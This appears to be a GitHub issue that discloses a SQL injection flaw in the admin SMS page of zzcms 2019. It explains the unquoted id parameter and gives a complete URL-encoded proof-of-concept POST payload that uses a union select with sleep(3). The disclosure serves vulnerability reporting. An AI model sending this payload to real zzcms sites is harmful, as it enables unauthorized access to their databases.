Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

zzcms 2019 admin/dl_sendsms.php SQL injection #2

Open
cby234 opened this issue May 20, 2019 · 0 comments
Open

zzcms 2019 admin/dl_sendsms.php SQL injection #2

cby234 opened this issue May 20, 2019 · 0 comments

Comments

@cby234
Copy link
Owner

cby234 commented May 20, 2019

Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/admin/dl_sendsms.php line 17 ~ 37)

image

Let's look at SQL query part

image

If index of , value is not 0 sql will be
(/* if(strpos($id,",")>0) */ => line 32)

"select * from zzcms_dl where saver<>'' and id in (". $id .")"

There is no single quote for id parameter. So We can inject any sql in id parameter
(Because of IF condition We should add "," value at the last of id parameter value)

0x02 payload

give below "POC" value for post data in "/admin/dl_sendsms.php"

POC : Union SQL injection submit23=%E7%BB%99%E6%8E%A5%E6%94%B6%E8%80%85%E5%8F%91%E6%89%8B%E6%9C%BA%E7%9F%AD%E4%BF%A1%E6%8F%90%E9%86%92&pagename=dl_manage.php%3Fb%3D0%26shenhe%3D%26page%3D1&tablename=zzcms_dl&id%5B%5D=1) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(3)-- a,

image

@cby234 cby234 closed this as completed May 20, 2019
@cby234 cby234 reopened this Jun 1, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant